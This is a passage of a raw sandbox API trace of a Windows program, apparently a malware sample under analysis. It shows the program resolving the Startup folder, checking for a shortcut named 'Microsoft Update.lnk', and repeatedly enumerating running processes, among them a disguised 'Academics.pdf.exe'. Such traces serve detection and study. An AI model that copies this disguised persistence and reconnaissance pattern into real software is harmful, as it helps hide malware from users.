HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0308.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0308.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0308.679] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0308.679] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0308.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0308.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0308.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0308.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0308.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0308.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0308.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.684] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0308.684] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0308.685] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0308.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.687] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.688] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.689] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.690] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.691] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.691] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.692] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0308.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0308.717] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0308.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0308.719] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0308.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0308.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0308.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0308.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0308.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0308.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0308.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0308.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0308.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0308.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0308.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0308.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0308.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0308.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0308.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0308.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0308.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0308.736] CloseHandle (hObject=0x294) returned 1 [0308.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0308.737] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0308.737] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0308.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.739] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 